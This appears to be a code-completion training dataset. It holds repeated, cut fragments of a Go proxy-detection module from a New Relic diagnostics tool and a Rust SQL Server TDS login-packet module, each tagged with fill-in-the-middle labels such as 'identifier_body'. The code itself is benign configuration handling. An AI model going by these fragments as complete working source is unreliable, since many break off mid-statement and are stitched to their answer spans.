func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].
|
{
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
|
identifier_body
|
proxyDetect.go
|
config file
}
// minion has combined auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - No dependencies since this is generally one of the first tasks to run
func (p BaseConfigProxyDetect) Dependencies() []string {
// no dependencies!
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect)
|
(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this is env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have succesfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for you app and it is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string) {
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there or to at least find out which agent are we dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precendence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precendence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and they ovewrite other proxy settings
if proxy.proxyURL != "" {
return proxy.proxyURL
}
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will preprend a protocol to their host configuration. So want to avoid building a url such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].Payload
|
Execute
|
identifier_name
|
proxyDetect.go
|
config file
}
// minion has combined auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - No dependencies since this is generally one of the first tasks to run
func (p BaseConfigProxyDetect) Dependencies() []string {
// no dependencies!
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect) Execute(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this is env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have succesfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for you app and it is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string) {
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there or to at least find out which agent are we dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precendence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precendence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and they ovewrite other proxy settings
if proxy.proxyURL != ""
|
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will preprend a protocol to their host configuration. So want to avoid building a url such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].
|
{
return proxy.proxyURL
}
|
conditional_block
|
proxyDetect.go
|
auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - No dependencies since this is generally one of the first tasks to run
func (p BaseConfigProxyDetect) Dependencies() []string {
// no dependencies!
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect) Execute(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this is env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have succesfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for you app and it is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string) {
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there or to at least find out which agent are we dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precendence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precendence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and they ovewrite other proxy settings
if proxy.proxyURL != "" {
return proxy.proxyURL
}
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will preprend a protocol to their host configuration. So want to avoid building a url such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].Payload.([]tasks.ProcIDSysProps)
|
random_line_split
|
||
login.rs
|
003,
/// 2012, 2014, 2016
SqlServerN = 0x74000004,
}
}
bitflags! {
pub struct LoginOptionFlags1: u8 {
const BIG_ENDIAN = 0b00000001;
/// Charset_EBDDIC, default/bit not set = Charset_ASCII
const CHARSET_EBDDIC = 0b00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL insteadof DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn done_row_count_bytes(self) -> u8
|
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client
|
{
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
|
identifier_body
|
login.rs
|
00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL insteadof DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn done_row_count_bytes(self) -> u8 {
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
}
/// the login packet
pub struct LoginMessage<'a> {
